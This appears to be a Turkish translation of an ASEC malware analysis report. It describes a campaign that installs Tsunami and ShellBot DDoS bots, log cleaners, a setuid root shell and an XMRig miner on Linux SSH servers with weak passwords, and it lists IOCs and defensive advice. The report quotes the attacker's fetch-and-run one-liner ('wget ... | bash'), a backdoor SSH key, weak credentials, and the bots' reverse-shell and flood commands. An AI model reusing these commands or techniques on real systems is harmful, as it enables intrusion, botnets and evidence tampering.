Linux Sunucular Tehlike Altında

AhnLab Güvenlik Acil Durum Müdahale Merkezi (ASEC) kısa bir süre önce, yetersiz yönetilen Linux SSH sunucularına kurulan Tsunami DDoS Botundan oluşan bir saldırı kampanyası keşfetti. Tehdit aktörü yalnızca Tsunami’yi yüklemekle kalmadı, aynı zamanda ShellBot, XMRig CoinMiner ve Log Cleaner gibi çeşitli başka kötü amaçlı yazılımları da yükledi.

Kötü yönetilen Linux SSH sunucularına yönelik saldırı durumlarına bakıldığında, bunların çoğu DDoS botlarının veya CoinMiners’ın kurulumunu içerir. DDoS botu, daha önce ShellBot [1] ve ChinaZ DDoS Botunun [2] yüklendiği saldırı vakalarında ASEC Blogunda ele alınmıştır . XMRig CoinMiner’ın kurulumu, SHC kötü amaçlı yazılımı [3] ve KONO DIO DA saldırı kampanyası [4] ile birlikte ele alındı .

Tsunami, Kaiten olarak da bilinen bir DDoS botudur. Genellikle savunmasız olan IoT cihazlarını hedeflerken Mirai ve Gafgyt ile birlikte sürekli olarak dağıtılan birkaç kötü amaçlı yazılım türünden biridir. Hepsinin DDoS botları olma ortak paydası olsa da Tsunami, tehdit aktörüyle iletişim kurmak için IRC’yi kullanan bir IRC botu gibi çalışmasıyla diğerlerinden sıyrılıyor.

Tsunami’nin kaynak kodu herkese açıktır, bu nedenle çok sayıda tehdit aktörü tarafından kullanılır. Çeşitli kullanımları arasında en çok IoT cihazlarına yönelik saldırılarda kullanılır. Tabii ki, aynı zamanda sürekli olarak Linux sunucularını hedeflemek için kullanılır. Ek olarak, XMRig CoinMiner’ın Tsunami ile halka açık bir Docker konteynerine dağıtıldığı duruma benzer şekilde, bir bulut ortamına da dağıtıldıkları başka bir vaka doğrulandı. Ayrıca, resmi olmayan bir şekilde dağıtılan Docker kapsayıcılarına kötü amaçlı yazılım dahil etmek, birincil saldırı vektörlerinden biridir.

Bu gönderi, bir tehdit aktörünün sözlük saldırıları gerçekleştirdikten sonra kötü yönetilen SSH sunucularında oturum açmayı başardığı ve ardından DDoS Botları ve XMRig CoinMiner’ı yüklediği bir durumu ele alacaktır.

1. Linux SSH Sunucularına Karşı Sözlük Saldırısı
Kötü yönetilen hizmetler, Linux sunucuları gibi sunucu ortamlarını hedeflemek için kullanılan saldırı vektörlerinin başlıca örneklerinden biridir. Secure Shell (SSH) hizmeti çoğu Linux sunucu ortamında kuruludur, saldırılar için kolayca kullanılabilir ve kötü yönetime eğilimlidir. SSH, yöneticilerin uzaktan oturum açmasına ve sistemi kontrol etmesine izin verir, ancak bunu yapmak için sisteme kayıtlı kullanıcı hesabında oturum açmaları gerekir.

Bir Linux sisteminde basit hesap kimlik bilgileri (ID/PW) kullanılıyorsa, bir tehdit aktörü kaba kuvvet veya sözlük saldırısı yoluyla sisteme giriş yaparak kötü amaçlı komutlar yürütmesine izin verebilir. Kötü yönetilen Linux SSH sunucularına saldırıldığında, ana saldırı yöntemi, port taraması yoluyla harici olarak açığa çıkan SSH sunucularını aramayı ve sözlük saldırıları gerçekleştirmek ve oturum açmak için bilinen hesap kimlik bilgilerini kullanmayı içerir. Daha sonra kötü amaçlı yazılım indirilir.

Aşağıdaki tablo, yukarıda belirtilen saldırı kampanyasından, saldırıya uğrayan adresleri kimlikleri ve şifreleriyle birlikte gösteren listenin bir bölümüdür.

 

ID Password Attack Target
admin qwe123Q# 124.160.40[.]48
sxit sxit 124.160.40[.]94
root abcdefghi 124.160.40[.]94
root 123@abc 124.160.40[.]94
weblogic 123 124.160.40[.]94
rpcuser rpcuser 124.160.40[.]94
test p@ssw0rd 124.160.40[.]94
nologin nologin 124.160.40[.]94
Hadoop p@ssw0rd 124.160.40[.]94
hxw test123 124.160.40[.]94
backlog backlog 124.160.40[.]94
dell 123 124.160.40[.]94

Table 1. Attack locations and account credentials used in the attack campaign

 

2. Saldırı Akışı
Başarıyla oturum açtıktan sonra, tehdit aktörü çeşitli kötü amaçlı yazılımları indirip çalıştırmak için aşağıdakine benzer bir komut yürütür.

# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &

Yüklenen kötü amaçlı yazılımlar arasında “anahtar” dosyası, ek kötü amaçlı yazılımlar yükleyen indirici tipi bir Bash betiğidir. Bir indirici olmanın yanı sıra, bir arka kapı SSH hesabı kurmayı da içeren, virüs bulaşmış sistemlerin kontrolünü ele geçirmek için çeşitli ön görevleri yerine getirir.

image 10
Şekil 1. “anahtar” Bash betiği
Uzak bir SSH sunucusunda oturum açarken, genel ve özel anahtarlar üreterek ID ve PW olmadan oturum açmak mümkündür. Bunu başarmak için, bir kullanıcı genel ve özel SSH anahtarları oluşturabilir ve ardından genel anahtarını istediği sunucuya kaydedebilir. Daha sonra, özel anahtar istemcide oturum açmak için kullanılabilir. Tehdit aktörü, aşağıdaki genel anahtarı “yetkili_anahtarlar” dosyasına yeni yazmak için bu komutu kullanır. Bunu yaparak, tehdit aktörü daha sonra ortak anahtara karşılık gelen özel anahtarı kullanabilir ve virüs bulaşmış sistemde oturum açmalarına izin verir.

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9h Vz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqo AoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD

Yürütülen komut ve oturum açtıktan sonra indirici Bash betiği aracılığıyla yüklenen kötü amaçlı yazılımlar aşağıda özetlenmiştir. Her kötü amaçlı yazılım türünün analizi de sağlanır.

Download URL Malware
ddoser[.]org/key Downloader Bash
ddoser[.]org/logo ShellBot DDoS Bot
ddoser[.]org/siwen/bot ShellBot DDoS Bot
ddoser[.]org/siwen/a Tsunami DDoS Bot
ddoser[.]org/siwen/cls MIG Logcleaner v2.0
ddoser[.]org/siwen/clean 0x333shadow Log Cleaner
ddoser[.]org/siwen/ping6 Privilege escalation malware
ddoser[.]org/top XMRig CoinMiner (compressed file)

3. Kötü Amaçlı Yazılım Analizi
3.1. tsunami
Kaiten olarak da bilinen DDoS bot kötü amaçlı yazılımı olan Tsunami, kaynak kodu herkese açık olduğundan çeşitli tehdit aktörleri tarafından kullanılmaktadır. Tehdit aktörleri, daha fazla özellik eklemek için genellikle mevcut Kaiten’in kaynak kodunu değiştirir ve bu saldırıda kullanılan Tsunami, Kaiten’in Ziggy adlı bir çeşididir. Gerçek yardım komutunda gösterilen açıklamalar karşılaştırıldığında, bunlar kaynak koduyla aynıdır.

image 11

Tsunami ikili dosyasında yer alan yapılandırma verilerine bakıldığında, tehdit aktörünün ona “ddoser – v0.69” adını eklediğini görebilirsiniz.

image 12

Tsunami’nin bir özelliği, C&C sunucularıyla iletişim kurmak için bir IRC protokolü kullanmasıdır. IRC, 1988’de geliştirilmiş gerçek zamanlı bir İnternet sohbet protokolüdür. Kullanıcılar, belirli IRC sunucularının belirli kanallarında oturum açar ve aynı kanalda oturum açmış diğer kullanıcılarla gerçek zamanlı olarak sohbet eder. IRC botu, C&C sunucularıyla iletişim kurmak için bu IRC hizmetini kötüye kullanan bir bot kötü amaçlı yazılımıdır.

Etkilenen sisteme kurulan IRC bot, bir IRC sunucusunun IRC protokolüne göre tehdit aktörü tarafından belirlenen kanalına erişir ve ardından çalınan bilgileri belirtilen kanala iletir veya saldırgan belirli bir diziyi girdiğinde bunu alır. komut verir ve ilgili kötü niyetli davranışı gerçekleştirir. IRC, ayrı bir C&C sunucusu ve protokolü geliştirmek zorunda kalmadan önceden var olan bir IRC protokolünü ve IRC sunucusunu kullandığı için kötü amaçlı yazılımlardan tutarlı bir şekilde yararlandığını gördü.

Tsunami çalıştırıldığında, “/etc/rc.local” dosyasına kendi yolunu yazar ve yeniden başlatmalardan sonra bile çalışmasını sağlar. Daha sonra çalışmakta olan işlemin adını “[kworker/0:0]” olarak değiştirmeye çalışır. Bu, normal bir işlemle aynı adı verir ve kullanıcıların fark etmesini zorlaştırır. Tsunami bu noktaya geldiğinde IRC sunucusuna bağlanır, bir kanala katılır ve tehdit aktörünün komutlarını bekler.

Ek olarak, C&C adresi ve kanal şifresi gibi bilgiler şifrelenir ve kaydedilir. Tsunami, yürütülmesi sırasında ihtiyaç duyduğu dizilerin şifresini çözer ve alır. İki C&C sunucu adresi vardır ve Tsunami bağlantı kurmak için bunlardan birini rastgele seçer.

image 13

Aşağıdaki tablo, C&C sunucu adresine dahil olan çeşitli yapılandırma verilerinin ayrıntılarını vermektedir. Bir IRC sunucusuna katılırken takma ad olarak rastgele bir dizi kullanıldığını unutmayın.

 

Configuration Data
Version ddoser – v0.69
Architectre x86_64
Name to disguise itself as [kworker/0:0]
C&C server (IRC) ircx.us[.]to:53
ircxx.us[.]to:53
IRC channel name ddoser
IRC channel password (enc_passwd) bakla
Activation/deactivation password null
Default HTTP server address for downloading localhost (deactivated)

 

image 14

Tsunami, temel IRC komutlarıyla birlikte çeşitli DDoS saldırı komutlarını destekler. Ayrıca, sistem bilgisi toplama, komut yürütme ve ters kabuk gibi virüslü sistemleri kontrol etmeye yönelik özellikler de sağlar.

 

Type Command Feature
Remote control SYSINFO System information
(CPU, memory, network information, OS version, login user, Uptime)
GET Download file from external source
UPDATE Update bot
ENABLE / DISABLE Activate/deactivate bot (password required)
SH / ISH / SHD / BASH Execute shell command
RSHELL Reverse shell
KILL Terminate
DDoS attack PAN / SYNFLOOD / NSSYNFLOOD SYN Flood
ACKFLOOD / NSACKFLOOD Ack Flood
RANDOMFLOOD Syn/Ack Flooder
UDP UDP Flood
UNKNOWN Non-spoof UDP Flood
SPOOFS IP spoofing during DDoS attack
GETSPOOFS Return IP spoofing used during DDoS attack
KILLALL Terminate attack

3.2. ShellBot
İlk yürütme komutu ve Bash indirici “anahtarı” aracılığıyla yüklenen “bot” ve “logo” aslında aynı ShellBot kötü amaçlı yazılımıdır. ShellBot, Perl’de geliştirilmiş bir DDoS botudur ve aynı zamanda Tsunami gibi IRC protokolünü kullanan bir IRC Botudur. Daha önce ASEC Blogunda, kötü yönetilen Linux SSH sunucularına saldırmak için kullanılan ShellBot kötü amaçlı yazılımı kategorize edilmiş ve analiz edilmişti. [5] Bu saldırıda kullanılan ShellBot suşları, önceki gönderide ele alınanların hiçbiriyle aynı değildir, ancak inkar edilemez bir şekilde ShellBot’un varyantlarıdır.

Bu saldırıda kullanılan ShellBot’ların tümü, C&C sunucu adresini ve port numarasını argüman olarak alarak çalışır. Saldırıda kullanılan C&C sunucu adreslerinin listesi aşağıdadır.

ShellBot IRC Server Address
logo irc.undernet[.]org:6667
bot ircx.us[.]to:6667
bot irc.dal[.]net:6667
bot irc.undernet[.]org:6667
bot ircx.us[.]to:20

Diğer ShellBot’lara benzer şekilde, tuttukları listeden bir takma ad seçilir. Kanalda komut verebilmek için admin kılığında kanala giren tehdit aktörünün rumuz ve host adresi doğrulanır. IRC kanalı, Tsunami kötü amaçlı yazılımı “#ddoser” ile aynı adı kullanır.

image 15

 

ShellBot Configuration Data
Both Channel name ddoser, #packeter
Both Channel password s6x
Both Nickname (multiple)
bot Channel admin’s nickname “Janroe”,”thief”,”eXploiter”,”Bolero”,”Janr0e”,”nobody”
logo Channel admin’s nickname “Janroe”,”thief”,”eXploiter”,”emperor”,”nobody”
bot Channel admin’s host “exploiter.users.undernet[.]org”,
“Janroe.users.undernet[.]org”,
“ddoser.users.undernet[.]org”,
“ddoser[.]de”,”ddoser[.]org”
logo Channel admin’s host “exploiter.users.undernet[.]org”,
“theft.users.undernet[.]org”,
“Janroe.users.undernet[.]org”,
“ddoser[.]org”,”ddoser[.]de”
Table 6. Configuration data of ShellBot

ShellBot, bağlantı noktası taramayı, temel DDoS saldırılarını ve ters kabukları destekler.

Command Feature
portscan Port scan
udpflood UDP Flood
tcpflood TCP Flood
httpflood HTTP Flood
back Reverse shell

3.3. Günlük Temizleyici
Log Cleaner kötü amaçlı yazılımı, tehdit aktörü tarafından yüklenen kötü amaçlı yazılımlar arasında yer alır. Linux sunucu ortamlarında, kullanıcıların veya tehdit aktörlerinin faaliyetlerini kaydeden çeşitli türde günlük dosyaları vardır. Günlük Temizleyici, bu günlük dosyalarındaki belirli günlüklerin silinmesini veya değiştirilmesini sağlayan bir araçtır. Tehdit aktörünün, ihlallerinin sonraki analizlerini engellemek amacıyla Log Cleaner’ı yüklediğine inanılıyor.

Yüklenen dosyalar arasında “cls”, “MIG Logcleaner v2.0” ve “clean”, “0x333shadow Log Cleaner” dir. Yeni başlayanlar için MIG LogCleaner, Linux, Unix ve BSD sistemlerinden istenen günlükleri silmek için aşağıda gösterilenler gibi çeşitli seçenekleri bağımsız değişken olarak alma yeteneğine sahiptir.

image 16

Argument Description
[-u <user>] User name
[-n <n>] Number of entries to delete. The default is 1. 0 will select all.
[-D <dir>] Base log directory (Default is /var/log/)
[-a <string1>] IP string to remove from files within the log directory
[-b <string2>] Domain string to remove from files within the log directory
[-R] Replace Mode
[-A] Add Mode
[-U <user>] User name to change or add in Replace or Add Mode
[-H <host>] Host name to change or add in Replace or Add Mode
[-I <n>] Login time to change or add in Replace or Add Mode
[-O <n>] Logout time to change or add in Replace or Add Mode
[-T <tty>] tty to add in Add Mode
[-d] Run in debug mode

Bir Linux ortamında oturum açmış kullanıcılara ilişkin günlük dosyaları aşağıdaki gibidir ve tehdit aktörleri bu günlük dosyalarını manipüle ederek oturum açma kayıtlarını silebilir veya değiştirebilir.

Path Details Command
utmp /var/run/utmp (Linux)
/var/adm/utmpx (Solaris)
Information of currently logged-in user w, who, finger
wtmp /var/log/wtmp (Linux)
/var/adm/wtmpx (Solaris)
Login/logout information last
last log /var/log/lastlog (Linux)
/var/adm/lastlog (Solaris)
Information of last successful login lastlog (Linux)
finger (Solaris)

Çeşitli günlük dosyaları MIG LogCleaner aracılığıyla değiştirilebilir. Örneğin, belirli bir dizeye sahip satırları silebilir, dizeyi değiştirebilir veya yeni bir dize ekleyebilir. Ayrıca, bir giriş kaydı eklemek için aşağıdaki gibi bir komut kullanılabilir.

image 17

Birlikte yüklenen “0x333shadow Log Cleaner” aynı özelliklere sahiptir.

image 18
3.4. Ayrıcalık Yükseltme Kötü Amaçlı Yazılımı
“ping6” dosyası, aşağıdaki basit yapıya sahip bir ELF kötü amaçlı yazılımıdır. setuid() ve setgid() işlevleri, kabuğu çalıştırmadan önce kullanıcı kimliğini ve grup kimliğini kök hesap olarak ayarlamak için kullanılır.
image 19

“Anahtar” Bash betiği, “ping6” yüklendikten sonra setuid’i ayarlar. Kök hesapla başarılı bir giriş yapılırsa ve hesapla birlikte “anahtar” Bash komut dosyası yüklenirse, tehdit aktörü daha sonra kök ayrıcalıklarına sahip bir kabuğa erişim elde etmek için “ping6″yı kullanabilir.

image 20
3.5. XMRig CoinMiner
Bu özel saldırı kampanyasında, DDoS botlarının yanı sıra bir CoinMiner da kurulur. Bir sözlük saldırısı aracılığıyla oturum açtıktan sonra yürütülen komut, tar adlı sıkıştırılmış bir dosyayı indirir ve açar. Ortaya çıkan “go” dosyası daha sonra yürütülür. Basit bir Bash betiği olarak “go”, aynı yolda bulunan “televizor” dosyasını yürütür. “televizor” aynı zamanda bir Bash betiğidir ve “telecomanda” Bash betiğini yürütür. Bu sonuçta XMRig CoinMiner “cnrig” in yürütülmesine yol açar.

image 21
Madeni para madenciliği için gerekli olan yapılandırma verileri, aynı yol üzerinde bulunan “config.json” dosyasında tutulur.

Mining Pool : monerohash[.]com:80
user : “46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse”
pass : “nobody”

4. Sonuç
Kötü yönetilen Linux SSH sunucularına yönelik saldırı kampanyaları, oldukça uzun bir süredir ısrarla gerçekleşmektedir. Tehdit aktörü, virüslü sistemlerde Tsunami ve ShellBot gibi DDoS botlarının yanı sıra XMRig CoinMiner’ı kurdu.

CoinMiner’ın kurulu olduğu ortamlarda, virüslü sistemin kaynakları, tehdit aktörü için Monero madeni paraları çıkarmak için kullanılır. Virüs bulaşmış sistemler, ayrıca yüklenen DDoS botları nedeniyle DDoS saldırıları için kullanılabilir ve ek kötü amaçlı komutların yürütülmesine izin verir. Bu kötü amaçlı yazılımlar silinse bile, tehdit aktörü yine yüklemiş olduğu SSH arka kapı hesabını kullanarak sisteme yeniden erişim sağlayabilir. Bu, farklı kötü amaçlı yazılım yüklemek ve sistemden bilgi çalmak gibi çeşitli kötü amaçlı davranışlar gerçekleştirmelerine olanak tanır.

Bu nedenle yöneticiler, Linux sunucusunu kaba kuvvet saldırılarından ve sözlük saldırılarından korumak için hesapları için tahmin edilmesi zor parolalar kullanmalı ve bunları periyodik olarak değiştirmeli ve güvenlik açığı saldırılarını önlemek için en son yamaya güncelleme yapmalıdır. Saldırganların erişimini kısıtlamak için dışarıdan erişilebilen sunucular için güvenlik duvarları gibi güvenlik programları da kullanmalıdırlar. Son olarak, kötü amaçlı yazılım bulaşmasını önceden engellemek için V3’ü en son sürüme güncelleyerek dikkatli olunmalıdır.

Dosya Algılama
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Linux/Tsunami.Gen (2016.08.24.00)
– Shellbot/Perl.Generic.S1118 (2020.02.19.07)
– İndirici/Shell.Agent.SC189601 (2023.06.12.02)
– HackTool/Linux.LogWiper.22272 (2023.06.12.02)
– HackTool/Linux.LogWiper.28728 (2023.06.12.02)
– Trojan/Linux.Agent.8456 (2023.06.12.02)
– Trojan/Shell.Runner (2023.06.12.02) )
– CoinMiner/Text.Config (2023.06.12.02)

IOC
MD5
– 6187ec1eee4b0fb381dd27f30dd352c9 : İndirici Bash betiği (anahtar)
– 822b6f619e642cc76881ae90fb1f8e8e : Tsunami (a)
– c5142b41947f5d1853785020d9350de4 : ShellBot (bot) )
– 2cd8157ba0171ca5d8b50499f4440d96 : ShellBot (logo) – 32eb33cdfa763b012cd8bcad97d560f0
: MIG Logcleaner v2.0 (cls) –
98b8cd5ccd6f7177007976aeb675ec38 : 0x3 33shadow Günlük Temizleyici ( temiz)
– e2f08f163d81f79c1f94bd34b22d3191 : Ayrıcalık Arttırma Kötü Amaçlı Yazılımı (ping6)
– 725ac5754b123923490c79191fdf4f76 : Bash başlatıcısı (git)
– ad04aab3e732ce5220db0b0fc9bc8a19 : Bas h başlatıcı (televizör)
– 421ffee8a223210b2c8f2384ee6a88b4 : Bash başlatıcı (telecomanda)
– 0014403121eeaebaeede796e4b6e5dbe : XMRig CoinMiner (cnrig)
– 125951260a0cb473ce9b7acc406e83e1 : XMRig yapılandırma dosyası (config.json)

C&C
– ircx.us[.]to:20 : ShellBot
– ircx.us[.]to:53 : Tsunami
– ircx.us[.]to:6667 : ShellBot
– ircxx.us[.]to:53 : Tsunami

다운로드 주소
– ddoser[.]org/key: İndirici Bash betiği
– ddoser[.]org/a : Tsunami
– ddoser[.]org/logo : ShellBot
– ddoser[.]o]rg/siwen/bot / ShellBot DDoS Bot
– ddoser[.]org/top : Sıkıştırılmış XMRig CoinMiner dosyası
– ddoser[.]org/siwen/cls : MIG Logcleaner v2.0
– ddoser[.]org/siwen/clean : 0x333shadow Günlük Temizleyici
– ddoser[.]org/ siwen/ping6 : Ayrıcalık yükseltme kötü amaçlı yazılımı

Bir Yorum

  1. Makale için teşekkürler! Bu sayede Linux sunucuların da güvenlik risklerini daha iyi anladım. Özellikle saldırganların nasıl zararlı komut dosyalarını sunuculara yüklediği konusu ilginç geldi. Yazar, başka hangi önlemlerin alınabileceğini ve nasıl korunulabileceğimizi de aktarabilirdi. Umarım gelecekte daha fazla ayrıntıya yer verirsiniz.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu